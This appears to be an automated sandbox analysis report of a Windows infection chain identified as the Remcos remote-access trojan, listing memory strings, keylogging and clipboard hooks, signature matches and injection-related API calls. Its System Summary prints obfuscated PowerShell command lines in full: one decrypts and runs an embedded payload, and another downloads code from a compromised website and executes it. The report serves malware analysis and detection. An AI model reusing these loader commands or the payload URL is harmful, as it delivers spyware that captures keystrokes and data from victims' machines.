                  Source: powershell.exe, 0000000E.00000002.3272352105.00000000053D6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://new.quranushaiqer.org.sa/wp-admin/oserve/transportment.pfml
                  Source: powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3335508177.00000000051FC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
                  Source: bhvCCC4.tmp.7.dr | String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-04-14-10-35/PreSignInSettingsConfig.json
                  Source: bhvCCC4.tmp.7.dr | String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=4954a0
                  Source: bhvCCC4.tmp.7.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
                  Source: bhvCCC4.tmp.7.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
                  Source: bhvCCC4.tmp.7.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
                  Source: bhvCCC4.tmp.7.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
                  Source: bhvCCC4.tmp.7.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
                  Source: bhvCCC4.tmp.7.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-0debb885be07c402c948.js
                  Source: bhvCCC4.tmp.7.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
                  Source: bhvCCC4.tmp.7.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ec3581b6c9e6e9985aa7.chunk.v7.js
                  Source: bhvCCC4.tmp.7.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
                  Source: bhvCCC4.tmp.7.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.6c288f9aff9797959103.chunk.v7.js
                  Source: bhvCCC4.tmp.7.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.9ba2d4c9e339ba497e10.chunk.v7.js
                  Source: bhvCCC4.tmp.7.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-1652fd8b358d589e6ec0.js
                  Source: bhvCCC4.tmp.7.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.52c45571d19ede0a7005.chunk.v7.j
                  Source: bhvCCC4.tmp.7.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.d918c7fc33e22b41b936.chunk.v7.c
                  Source: bhvCCC4.tmp.7.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
                  Source: bhvCCC4.tmp.7.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
                  Source: bhvCCC4.tmp.7.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
                  Source: bhvCCC4.tmp.7.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
                  Source: bhvCCC4.tmp.7.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
                  Source: bhvCCC4.tmp.7.dr | String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
                  Source: bhvCCC4.tmp.7.dr | String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
                  Source: bhvCCC4.tmp.7.dr | String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
                  Source: bhvCCC4.tmp.7.dr | String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
                  Source: bhvCCC4.tmp.7.dr | String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
                  Source: bhvCCC4.tmp.7.dr | String found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
                  Source: bhvCCC4.tmp.7.dr | String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
                  Source: bhvCCC4.tmp.7.dr | String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
                  Source: RegAsm.exe, RegAsm.exe, 00000009.00000002.2121605113.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: https://www.google.com
                  Source: RegAsm.exe | String found in binary or memory: https://www.google.com/accounts/servicelogin
                  Source: bhvCCC4.tmp.7.dr | String found in binary or memory: https://www.office.com/
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49720
                  Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49719 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49720 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49719
                  Source: unknown | HTTPS traffic detected: 93.113.54.56:443 -> 192.168.2.5:49711 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 34.166.62.190:443 -> 192.168.2.5:49720 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,00000000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx

                  E-Banking Fraud

                  Source: Yara match | File source: 4.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 2.2.powershell.exe.1b1e29723d0.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 2.2.powershell.exe.1b1e29723d0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000004.00000002.3265268792.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000002.00000002.2109299164.000001B1E188F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000002.00000002.2109299164.000001B1E269C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: powershell.exe PID: 4432, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 5684, type: MEMORYSTR
                  Source: Yara match | File source: C:\Users\user\AppData\Roaming\sfvnspt.dat, type: DROPPED

                  Spam, unwanted Advertisements and Ransom Demands

                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_0041C9E2 SystemParametersInfoW

                  System Summary

                  Source: amsi32_7244.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: amsi32_7632.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: 4.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 4.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 4.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 2.2.powershell.exe.1b1e29723d0.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 2.2.powershell.exe.1b1e29723d0.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 2.2.powershell.exe.1b1e29723d0.1.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 2.2.powershell.exe.1b1e29723d0.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 2.2.powershell.exe.1b1e29723d0.1.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 2.2.powershell.exe.1b1e29723d0.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000002.00000002.2109299164.000001B1E188F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000002.00000002.2109299164.000001B1E269C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 4432, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 4432, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: RegAsm.exe PID: 5684, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 7244, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 7632, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Dropped file: Call Terminologers183.ShellExecute("P" & Essens, forsaales, "", "", Swizzled221)
                  Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 3116
                  Source: C:\Windows\SysWOW64\wscript.exe | Process created: Commandline size = 3859
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: Commandline size = 3859
                  Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI98685860701936162316809131591218CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'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CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cReP
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). 
');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 49%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_004180EF GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_004132D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_0041BB09 OpenProcess,NtSuspendProcess,CloseHandle
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_0041BB35 OpenProcess,NtResumeProcess,CloseHandle
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_00401806 NtdllDefWindowProc_W
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_004018C0 NtdllDefWindowProc_W
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_004016FD NtdllDefWindowProc_A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_004017B7 NtdllDefWindowProc_A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_00402CAC NtdllDefWindowProc_A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_00402D66 NtdllDefWindowProc_A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FF848FD2CFC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_0043E0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_0041F0FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_00454159
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_00438168
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_004461F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_0043E2FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_0045332B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_0042739D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_004374E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_0043E558
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_00438770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_004378FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_00433946
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_0044D9C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_00427A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_0041DB62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_00427BAF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_00437D33
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_00435E5E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_00426E0E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_0043DE9D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_00413FCA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_00436FEA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_10017194
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_1000B5C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_0044B040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_0043610D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_00447310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_0044A490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_0040755A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_0043C560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_0044B610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_0044D6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_004476F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_0044B870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_0044081D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_00414957
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_004079EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_00407AEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_0044AA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_00412AA9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_00404B74
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_00404B03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_0044BBD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_00404BE5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_00404C76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_00415CFE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_00416D72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_00446D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_00446D8B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_00406E8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_00405038
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0041208C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_004050A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0040511A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0043C13A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_004051AB
